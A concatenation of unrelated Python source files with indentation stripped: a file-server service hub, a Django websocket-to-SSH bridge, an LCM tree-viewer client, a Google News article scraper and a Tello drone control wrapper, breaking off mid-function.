# initiate all services to manage
self.asrv = AuthSrv(self.args, self.log)
if args.ls:
self.asrv.dbg_ls()
self.tcpsrv = TcpSrv(self)
self.up2k = Up2k(self)
self.thumbsrv = None
if not args.no_thumb:
if HAVE_PIL:
if not HAVE_WEBP:
args.th_no_webp = True
msg = "setting --th-no-webp because either libwebp is not available or your Pillow is too old"
self.log("thumb", msg, c=3)
self.thumbsrv = ThumbSrv(self)
else:
msg = "need Pillow to create thumbnails; for example:\n{}{} -m pip install --user Pillow\n"
self.log(
"thumb", msg.format(" " * 37, os.path.basename(sys.executable)), c=3
)
# decide which worker impl to use
if self.check_mp_enable():
from .broker_mp import BrokerMp as Broker
else:
self.log("root", "cannot efficiently use multiple CPU cores")
from .broker_thr import BrokerThr as Broker
self.broker = Broker(self)
def thr_httpsrv_up(self):
time.sleep(5)
failed = self.broker.num_workers - self.httpsrv_up
if not failed:
return
m = "{}/{} workers failed to start"
m = m.format(failed, self.broker.num_workers)
self.log("root", m, 1)
os._exit(1)
def cb_httpsrv_up(self):
self.httpsrv_up += 1
if self.httpsrv_up != self.broker.num_workers:
return
self.log("root", "workers OK\n")
self.up2k.init_vols()
thr = threading.Thread(target=self.sd_notify, name="sd-notify")
thr.daemon = True
thr.start()
def _logname(self):
dt = datetime.utcnow()
fn = self.args.lo
for fs in "YmdHMS":
fs = "%" + fs
if fs in fn:
fn = fn.replace(fs, dt.strftime(fs))
return fn
def _setup_logfile(self, printed):
base_fn = fn = sel_fn = self._logname()
if fn != self.args.lo:
ctr = 0
# yup this is a race; if started sufficiently concurrently, two
# copyparties can grab the same logfile (considered and ignored)
while os.path.exists(sel_fn):
ctr += 1
sel_fn = "{}.{}".format(fn, ctr)
fn = sel_fn
try:
import lzma
lh = lzma.open(fn, "wt", encoding="utf-8", errors="replace", preset=0)
except:
import codecs
lh = codecs.open(fn, "w", encoding="utf-8", errors="replace")
lh.base_fn = base_fn
argv = [sys.executable] + self.argv
if hasattr(shlex, "quote"):
argv = [shlex.quote(x) for x in argv]
else:
argv = ['"{}"'.format(x) for x in argv]
msg = "[+] opened logfile [{}]\n".format(fn)
printed += msg
lh.write("t0: {:.3f}\nargv: {}\n\n{}".format(E.t0, " ".join(argv), printed))
self.logf = lh
print(msg, end="")
def run(self):
self.tcpsrv.run()
thr = threading.Thread(target=self.thr_httpsrv_up)
thr.daemon = True
thr.start()
for sig in [signal.SIGINT, signal.SIGTERM]:
signal.signal(sig, self.signal_handler)
# macos hangs after shutdown on sigterm with while-sleep,
# windows cannot ^c stop_cond (and win10 does the macos thing but winxp is fine??)
# linux is fine with both,
# never lucky
if ANYWIN:
# msys-python probably fine but >msys-python
thr = threading.Thread(target=self.stop_thr, name="svchub-sig")
thr.daemon = True
thr.start()
try:
while not self.stop_req:
time.sleep(1)
except:
pass
self.shutdown()
thr.join()
else:
self.stop_thr()
def stop_thr(self):
while not self.stop_req:
with self.stop_cond:
self.stop_cond.wait(9001)
self.shutdown()
def signal_handler(self, sig, frame):
if self.stopping:
return
self.stop_req = True
with self.stop_cond:
self.stop_cond.notify_all()
def shutdown(self):
if self.stopping:
return
# start_log_thrs(print, 0.1, 1)
self.stopping = True
self.stop_req = True
with self.stop_cond:
self.stop_cond.notify_all()
ret = 1
try:
with self.log_mutex:
print("OPYTHAT")
self.tcpsrv.shutdown()
self.broker.shutdown()
self.up2k.shutdown()
if self.thumbsrv:
self.thumbsrv.shutdown()
for n in range(200): # 10s
time.sleep(0.05)
if self.thumbsrv.stopped():
break
if n == 3:
print("waiting for thumbsrv (10sec)...")
print("nailed it", end="")
ret = 0
finally:
print("\033[0m")
if self.logf:
self.logf.close()
sys.exit(ret)
def _log_disabled(self, src, msg, c=0):
if not self.logf:
return
with self.log_mutex:
ts = datetime.utcnow().strftime("%Y-%m%d-%H%M%S.%f")[:-3]
self.logf.write("@{} [{}] {}\n".format(ts, src, msg))
now = time.time()
if now >= self.next_day:
self._set_next_day()
def _set_next_day(self):
if self.next_day and self.logf and self.logf.base_fn != self._logname():
self.logf.close()
self._setup_logfile("")
dt = datetime.utcnow()
# unix timestamp of next 00:00:00 (leap-seconds safe)
day_now = dt.day
while dt.day == day_now:
dt += timedelta(hours=12)
dt = dt.replace(hour=0, minute=0, second=0)
self.next_day = calendar.timegm(dt.utctimetuple())
def _log_enabled(self, src, msg, c=0):
"""handles logging from all components"""
with self.log_mutex:
now = time.time()
if now >= self.next_day:
dt = datetime.utcfromtimestamp(now)
print("\033[36m{}\033[0m\n".format(dt.strftime("%Y-%m-%d")), end="")
self._set_next_day()
fmt = "\033[36m{} \033[33m{:21} \033[0m{}\n"
if not VT100:
fmt = "{} {:21} {}\n"
if "\033" in msg:
msg = ansi_re.sub("", msg)
if "\033" in src:
src = ansi_re.sub("", src)
elif c:
if isinstance(c, int):
msg = "\033[3{}m{}".format(c, msg)
elif "\033" not in c:
msg = "\033[{}m{}\033[0m".format(c, msg)
else:
msg = "{}{}\033[0m".format(c, msg)
ts = datetime.utcfromtimestamp(now).strftime("%H:%M:%S.%f")[:-3]
msg = fmt.format(ts, src, msg)
try:
print(msg, end="")
except UnicodeEncodeError:
try:
print(msg.encode("utf-8", "replace").decode(), end="")
except:
print(msg.encode("ascii", "replace").decode(), end="")
if self.logf:
self.logf.write(msg)
def check_mp_support(self):
vmin = sys.version_info[1]
if WINDOWS:
msg = "need python 3.3 or newer for multiprocessing;"
if PY2 or vmin < 3:
return msg
elif MACOS:
return "multiprocessing is wonky on mac osx;"
else:
msg = "need python 3.3+ for multiprocessing;"
if PY2 or vmin < 3:
return msg
try:
x = mp.Queue(1)
x.put(["foo", "bar"])
if x.get()[0] != "foo":
raise Exception()
except:
return "multiprocessing is not supported on your platform;"
return None
def check_mp_enable(self):
if self.args.j == 1:
self.log("root", "multiprocessing disabled by argument -j 1;")
return False
if mp.cpu_count() <= 1:
return False
try:
# support vscode debugger (bonus: same behavior as on windows)
mp.set_start_method("spawn", True)
except AttributeError:
# py2.7 probably, anyways dontcare
pass
err = self.check_mp_support()
if not err:
return True
else:
self.log("svchub", err)
return False
def sd_notify(self):
try:
addr = os.getenv("NOTIFY_SOCKET")
if not addr:
return
addr = unicode(addr)
if addr.startswith("@"):
addr = "\0" + addr[1:]
m = "".join(x for x in addr if x in string.printable)
self.log("sd_notify", m)
sck = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sck.connect(addr)
sck.sendall(b"READY=1")
except:
self.log("sd_notify", min_ex())
|
server.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from threading import Thread
import paramiko
import json
from . import models
def add_log(user, content, log_type='1'):
try:
models.AccessLog.objects.create(
user=user,
log_type=log_type,
content=content
)
except Exception as e:
print(_('Error occurred while saving the log:'), e)
class WSSHBridge:
"""
桥接websocket和SSH的核心类
"""
def __init__(self, websocket, user):
self.user = user
self._websocket = websocket
self._tasks = []
self.trans = None
self.channel = None
self.cmd_string = ''
def open(self, host_ip, port=22, username=None, password=None):
"""
建立SSH连接
:param host_ip:
:param port:
:param username:
:param password:
:return:
"""
try:
self.trans = paramiko.Transport((host_ip, port))
self.trans.start_client()
self.trans.auth_password(username=username, password=password)
self.trans.set_keepalive(30)
self.channel = self.trans.open_session()
self.channel.get_pty()
self.channel.invoke_shell()
except Exception as e:
self._websocket.send(json.dumps({'error': e}))
raise
def _forward_inbound(self, data):
"""
正向数据转发,websocket -> ssh
:param channel:
:return:
"""
try:
self.channel.send(data)
return
except:
self.close()
# try:
# while True:
# data = self._websocket.receive()
# if not data:
# return
# data = json.loads(str(data))
#
# if 'data' in data:
# # print('websocket -> ssh', data['data'])
# # 心跳检测
# if data['data'] == 'heart beat check...':
# self._websocket.send(json.dumps({'data': data['data']}))
# continue
# self.cmd_string += data['data']
# channel.send(data['data'])
# finally:
# self.close()
def _forward_outbound(self):
"""
反向数据转发,ssh -> websocket
:param channel:
:return:
"""
try:
while True:
data = self.channel.recv(1024).decode('utf-8')
if not len(data):
return
# self.message['status'] = 0
# self.message['message'] = data
# message = json.dumps(self.message)
self._websocket.send(json.dumps({'data': data.decode()}))
except:
self.close()
# try:
# while True:
# wait_read(channel.fileno())
# data = channel.recv(1024)
# if not len(data):
# return
# self._websocket.send(json.dumps({'data': data.decode()}))
# finally:
# self.close()
def close(self):
"""
结束桥接会话
:return:
"""
self.channel.close()
self._websocket.close()
def shell(self, data):
"""
启动一个shell通信界面
:return:
"""
Thread(target=self._forward_inbound, args=(data,)).start()
Thread(target=self._forward_outbound).start()
|
viewerclient.py |
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = bytearray(json.dumps(data), encoding='utf-8')
msg.num_bytes = len(msg.data)
return msg
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform))
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1,1,1]):
self.lengths = lengths
def serialize(self):
return {
"type": "box",
"lengths": list(self.lengths)
}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {
"type": "sphere",
"radius": self.radius
}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1,1,1]):
self.radii = radii
def serialize(self):
return {
"type": "ellipsoid",
"radii": list(self.radii)
}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {
"type": "cylinder",
"length": self.length,
"radius": self.radius
}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {
"type": "triad",
"scale": self.scale,
"tube": self.tube
}
class PointCloud(BaseGeometry):
__slots__ = ["points", "channels"]
def __init__(self, points, channels={}):
self.points = points
self.channels = channels
def serialize(self):
return {
"type": "pointcloud",
"points": [list(p) for p in self.points],
"channels": {name: [list(c) for c in values] for (name, values) in self.channels.items()}
}
class PolyLine(BaseGeometry):
def __init__(self, points, radius=0.01, closed=False,
start_head=False, end_head=False,
head_radius=0.05, head_length=None):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": [list(p) for p in self.points],
"radius": self.radius,
"closed": self.closed
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in list(self.children.items()):
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
class CommandQueue(object):
def __init__(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
def isempty(self):
return not (self.settransform or self.setgeometry or self.delete)
def empty(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
class Visualizer(object):
"""
A Visualizer is a lightweight object that contains a CoreVisualizer and a
path. The CoreVisualizer does all of the work of storing geometries and
publishing LCM messages. By storing the path in the Visualizer instance,
we make it easy to do things like store or pass a Visualizer that draws to
a sub-part of the viewer tree.
Many Visualizer objects can all share the same CoreVisualizer.
"""
__slots__ = ["core", "path"]
def __init__(self, path=None, lcm=None, core=None):
if core is None:
core = CoreVisualizer(lcm)
if path is None:
path = tuple()
else:
if isinstance(path, str):
path = tuple(path.split("/"))
if not path[0]:
path = tuple([p for p in path if p])
self.core = core
self.path = path
def setgeometry(self, geomdata):
"""
Set the geometries at this visualizer's path to the given
geomdata (replacing whatever was there before).
geomdata can be any one of:
* a single BaseGeometry
* a single GeometryData
* a collection of any combinations of BaseGeometry and GeometryData
"""
self.core.setgeometry(self.path, geomdata)
return self
def settransform(self, tform):
"""
Set the transform for this visualizer's path (and, implicitly,
any descendants of that path).
tform should be a 4x4 numpy array representing a homogeneous transform
"""
self.core.settransform(self.path, tform)
def delete(self):
"""
Delete the geometry at this visualizer's path.
"""
self.core.delete(self.path)
def __getitem__(self, path):
"""
Indexing into a visualizer returns a new visualizer with the given
path appended to this visualizer's path.
"""
return Visualizer(path=self.path + (path,),
lcm=self.core.lcm,
core=self.core)
def start_handler(self):
"""
Start a Python thread that will subscribe to messages from the remote
viewer and handle those responses. This enables automatic reloading of
geometry into the viewer if, for example, the viewer is restarted
later.
"""
self.core.start_handler()
class CoreVisualizer(object):
def __init__(self, lcm=None):
if lcm is None:
lcm = LCM()
self.lcm = lcm
self.client_id = CLIENT_ID_FACTORY.new_client_id()
self.tree = LazyTree()
self.queue = CommandQueue()
self.publish_immediately = True
self.lcm.subscribe(self._response_channel(),
self._handle_response)
self.handler_thread = None
def _request_channel(self):
return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
def _response_channel(self):
return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
def _handler_loop(self):
while True:
self.lcm.handle()
def start_handler(self):
if self.handler_thread is not None:
return
self.handler_thread = threading.Thread(
target=self._handler_loop)
self.handler_thread.daemon = True
self.handler_thread.start()
def _handle_response(self, channel, msgdata):
msg = viewer2_comms_t.decode(msgdata)
data = json.loads(msg.data.decode())
if data["status"] == 0:
pass
elif data["status"] == 1:
for path in self.tree.descendants():
self.queue.setgeometry.add(path)
self.queue.settransform.add(path)
else:
raise ValueError(
"Unhandled response from viewer: {}".format(msg.data.decode()))
def setgeometry(self, path, geomdata):
if isinstance(geomdata, BaseGeometry):
self._load(path, [GeometryData(geomdata)])
elif isinstance(geomdata, Iterable):
self._load(path, geomdata)
else:
self._load(path, [geomdata])
def _load(self, path, geoms):
converted_geom_data = []
for geom in geoms:
if isinstance(geom, GeometryData):
converted_geom_data.append(geom)
else:
converted_geom_data.append(GeometryData(geom))
self.tree.getdescendant(path).geometries = converted_geom_data
self.queue.setgeometry.add(path)
self._maybe_publish()
def settransform(self, path, tform):
self.tree.getdescendant(path).transform = tform
self.queue.settransform.add(path)
self._maybe_publish()
def delete(self, path):
if not path:
self.tree = LazyTree()
else:
t = self.tree.getdescendant(path[:-1])
if path[-1] in t.children:
del t.children[path[-1]]
self.queue.delete.add(path)
self._maybe_publish()
def _maybe_publish(self):
if self.publish_immediately:
self.publish()
def publish(self):
if not self.queue.isempty():
data = self.serialize_queue()
msg = to_lcm(data)
self.lcm.publish(self._request_channel(), msg.encode())
self.queue.empty()
def serialize_queue(self):
delete = []
setgeometry = []
settransform = []
for path in self.queue.delete:
delete.append({"path": path})
for path in self.queue.setgeometry:
geoms = self.tree.getdescendant(path).geometries or []
setgeometry.append({
"path": path,
"geometries": [geom.serialize() for geom in geoms]
})
for path in self.queue.settransform:
settransform.append({
"path": path,
"transform": serialize_transform(
self.tree.getdescendant(path).transform)
})
return {
"utime": int(time.time() * 1e6),
"delete": delete,
"setgeometry": setgeometry,
"settransform": settransform
}
if __name__ == '__main__':
# We can provide an initial path if we want
vis = Visualizer(path="/root/folder1")
# Start a thread to handle responses from the viewer. Doing this enables
# the automatic reloading of missing geometry if the viewer is restarted.
vis.start_handler()
vis["boxes"].setgeometry(
[GeometryData(Box([1, 1, 1]),
color=np.random.rand(4),
transform=transformations.translation_matrix([x, -2, 0]))
for x in range(10)])
# Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
# implemented, so these sub-visualizers come into being as soon as they're
# asked for
vis = vis["group1"]
box_vis = vis["box"]
sphere_vis = vis["sphere"]
box = Box([1, 1, 1])
geom = GeometryData(box, color=[0, 1, 0, 0.5])
box_vis.setgeometry(geom)
sphere_vis.setgeometry(Sphere(0.5))
sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
vis["test"].setgeometry(Triad())
vis["test"].settransform(transformations.concatenate_matrices(
transformations.rotation_matrix(1.0, [0, 0, 1]),
transformations.translation_matrix([-1, 0, 1])))
vis["triad"].setgeometry(Triad())
# Setting the geometry preserves the transform at that path.
# Call settransform(np.eye(4)) if you want to clear the transform.
vis["test"].setgeometry(Triad())
# bug, the sphere is loaded and replaces the previous
# geometry but it is not drawn with the correct color mode
vis["test"].setgeometry(Sphere(0.5))
for theta in np.linspace(0, 2 * np.pi, 100):
vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
time.sleep(0.01)
#vis.delete()
|
core.py | from __future__ import print_function
import errno
import logging
import os
import pickle
import random
import re
import time
import requests
import threading
import json
import urllib.request
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
from newspaper import Article
from datetime import datetime, timedelta
from dateutil import parser
from queue import Queue
from urllib.parse import quote
from unidecode import unidecode
import dateparser
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT = 0
GOOGLE_NEWS_URL = 'https://www.google.com.my/search?q={}&source=lnt&tbs=cdr%3A1%2Ccd_min%3A{}%2Ccd_max%3A{}&tbm=nws&start={}'
logging.basicConfig(
level = logging.DEBUG, format = '%(asctime)s - %(levelname)s - %(message)s'
)
def get_date(load):
try:
date = re.findall(
'[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?', load
)
return '%s-%s-%s' % (date[2], date[0], date[1])
except Exce:
return False
def run_parallel_in_threads(target, args_list):
globalparas = []
result = Queue()
def task_wrapper(*args):
result.put(target(*args))
threads = [
threading.Thread(target = task_wrapper, args = args)
for args in args_list
]
for t in threads:
t.start()
for t in threads:
t.join()
while not result.empty():
globalparas.append(result.get())
globalparas = list(filter(None, globalparas))
return globalparas
def forge_url(q, start, year_start, year_end):
global NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT += 1
return GOOGLE_NEWS_URL.format(
q.replace(' ', '+'), str(year_start), str(year_end), start
)
def extract_links(content):
soup = BeautifulSoup(content, 'html.parser')
# return soup
today = datetime.now().strftime('%m/%d/%Y')
links_list = [v.attrs['href'] for v in soup.find_all('a', {'style': 'text-decoration:none;display:block'})]
dates_list = [v.text for v in soup.find_all('span', {'class': 'WG9SHc'})]
sources_list = [v.text for v in soup.find_all('div', {'class': 'XTjFC WF4CUc'})]
output = []
for (link, date, source) in zip(links_list, dates_list, sources_list):
try:
date = str(dateparser.parse(date))
except:
pass
output.append((link, source, date))
return output
def get_article(link, news, date):
article = Article(link)
article.download()
article.parse()
article.nlp()
lang = 'ENGLISH'
if len(article.title) < 5 or len(article.text) < 5:
lang = 'INDONESIA'
print('found BM/ID article')
article = Article(link, language = 'id')
article.download()
article.parse()
article.nlp()
return {
'title': article.title,
'url': link,
'authors': article.authors,
'top-image': article.top_image,
'text': article.text,
'keyword': article.keywords,
'summary': article.summary,
'news': news,
'date': date,
'language': lang,
}
def google_news_run(
keyword,
limit = 10,
year_start = 2010,
year_end = 2011,
debug = True,
sleep_time_every_ten_articles = 0,
):
num_articles_index = 0
ua = UserAgent()
results = []
while num_articles_index < limit:
url = forge_url(keyword, num_articles_index, year_start, year_end)
if debug:
logging.debug('For Google -> {}'.format(url))
logging.debug(
'Total number of calls to Google = {}'.format(
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
)
)
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'
}
success = False
try:
response = requests.get(url, headers = headers, timeout = 60)
if (
str(response.content).find(
'In the meantime, solving the above CAPTCHA will let you continue to use our services'
)
>= 0
):
print('whops, blocked')
return results
links = extract_links(response.content)
nb_links = len(links)
if nb_links == 0 and num_articles_index == 0:
print(
'No results fetched. Either the keyword is wrong or you have been banned from Google. Retry tomorrow or change of IP Address.'
)
return results
if nb_links == 0:
print('No more news to read for keyword {}.'.format(keyword))
return results
for link in links:
try:
results.append(get_article(*link))
except:
pass
success = True
except requests.exceptions.Timeout:
logging.debug(
'Google news Timeout. Maybe the connection is too slow. Skipping.'
)
continue
num_articles_index += 10
if debug and sleep_time_every_ten_articles != 0:
logging.debug(
'Program is going to sleep for {} seconds.'.format(
sleep_time_every_ten_articles
)
)
time.sleep(sleep_time_every_ten_articles)
return results
|
tello.py | # coding=utf-8
import socket
import time
import threading
import cv2
from threading import Thread
from djitellopy.decorators import accepts
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
"""
# Send and receive commands, client socket
UDP_IP = '192.168.10.1'
UDP_PORT = 8889
RESPONSE_TIMEOUT = 0.5 # in seconds
TIME_BTW_COMMANDS = 0.5 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds
last_received_command = time.time()
# Video stream, server socket
VS_UDP_IP: str = '0.0.0.0'
VS_UDP_PORT = 11111
# VideoCapture object
cap = None
background_frame_read = None
stream_on = False
def __init__(self):
# To send comments
self.address = (self.UDP_IP, self.UDP_PORT)
self.clientSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.clientSocket.bind(('', self.UDP_PORT)) # For UDP response (receiving data)
self.response = None
self.stream_on = False
# Run tello udp receiver on background
thread = threading.Thread(target=self.run_udp_receiver, args=())
thread.daemon = True
thread.start()
def run_udp_receiver(self):
"""Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
in order to not block the main thread."""
while True:
try:
self.response, _ = self.clientSocket.recvfrom(1024) # buffer size is 1024 bytes
except Exception as e:
print(e)
break
def get_udp_video_address(self):
return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
print (get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self):
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
@accepts(command=str)
def send_command_with_return(self, command):
"""Send command to Tello and wait for its response.
Return:
bool: True for successful, False for unsuccessful
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
print('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.RESPONSE_TIMEOUT * 1000:
print('Timeout exceed on command ' + command)
return False
print('Response: ' + str(self.response))
response = self.response.decode('utf-8')
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_command_without_return(self, command):
"""Send command to Tello without expecting a response. Use this method when you want to send a command
continuously
- go x y z speed: Tello fly to x y z in speed (cm/s)
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
- curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responses false.
x/y/z can’t be between -20 – 20 at the same time .
x1, x2: 20-500
y1, y2: 20-500
z1, z2: 20-500
speed: 10-60
- rc a b c d: Send RC control via four channels.
a: left/right (-100~100)
b: forward/backward (-100~100)
c: up/down (-100~100)
d: yaw (-100~100)
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
print('Send command (no expect response): ' + command)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
@accepts(command=str)
def send_control_command(self, command):
"""Send control command to Tello and wait for its response. Possible control commands:
- command: entry SDK mode
- takeoff: Tello auto takeoff
- land: Tello auto land
- streamon: Set video stream on
- streamoff: Set video stream off
- emergency: Stop all motors immediately
- up x: Tello fly up with distance x cm. x: 20-500
- down x: Tello fly down with distance x cm. x: 20-500
- left x: Tello fly left with distance x cm. x: 20-500
- right x: Tello fly right with distance x cm. x: 20-500
- forward x: Tello fly forward with distance x cm. x: 20-500
- back x: Tello fly back with distance x cm. x: 20-500
- cw x: Tello rotate x degree clockwise x: 1-3600
- ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
- flip x: Tello fly flip x
l (left)
r (right)
f (forward)
b (back)
- speed x: set speed to x cm/s. x: 10-100
- wifi ssid pass: Set Wi-Fi with SSID password
Return:
bool: True for successful, False for unsuccessful
"""
response = self.send_command_with_return(command)
if response == 'OK' or response == 'ok':
return True
else:
return self.return_error_on_send_command(command, response)
@accepts(command=str)
def send_read_command(self, command):
"""Send set command to Tello and wait for its response. Possible set commands:
- speed?: get current speed (cm/s): x: 1-100
- battery?: get current battery percentage: x: 0-100
- time?: get current fly time (s): time
- height?: get height (cm): x: 0-3000
- temp?: get temperature (°C): x: 0-90
- attitude?: get IMU attitude data: pitch roll yaw
- baro?: get barometer value (m): x
- tof?: get distance value from TOF (cm): x: 30-1000
- wifi?: get Wi-Fi SNR: snr
Return:
bool: True for successful, False for unsuccessful
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
print(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
if response.isdigit():
return int(response)
else:
return response
else:
return self.return_error_on_send_command(command, response)
@staticmethod
def return_error_on_send_command(command, response):
"""Returns False and print an informative result code to show unsuccessful response"""
print('Command ' + command + ' was unsuccessful. Message: ' + str(response))
return False
def connect(self):
"""Entry SDK mode
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("command")
def takeoff(self):
"""Tello auto takeoff
Returns:
bool: True for successful, False for unsuccessful
False: Unsuccessful
"""
return self.send_control_command("takeoff")
def land(self):
"""Tello auto land
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("land")
def streamon(self):
"""Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
can be done through the Tello app.
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamon")
if result is True:
self.stream_on = True
return result
def streamoff(self):
"""Set video stream off
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamoff")
if result is True:
self.stream_on = False
return result
def emergency(self):
"""Stop all motors immediately
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("emergency")
@accepts(direction=str, x=int)
def move(self, direction, x):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(direction + ' ' + str(x))
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def move_down(self, x):
"""Tello fly down with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("down", x)
@accepts(x=int)
def move_left(self, x):
"""Tello fly left with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("left", x)
@accepts(x=int)
def move_right(self, x):
"""Tello fly right with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("right", x)
@accepts(x=int)
def move_forward(self, x):
"""Tello fly forward with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("forward", x)
@accepts(x=int)
def move_back(self, x):
"""Tello fly back with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("back", x)
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def rotate_clockwise(self, x):
"""Tello rotate x degree clockwise.
Arguments:
x: 1-360
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("cw " + str(x))
@accepts(x=int)
def rotate_counter_clockwise(self, x):
"""Tello rotate x degree counter-clockwise.
Arguments:
x: 1-3600
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("ccw " + str(x))
@accepts(x=str)
def flip(self, direction):
"""Tello fly flip.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("flip " + direction)
def flip_left(self):
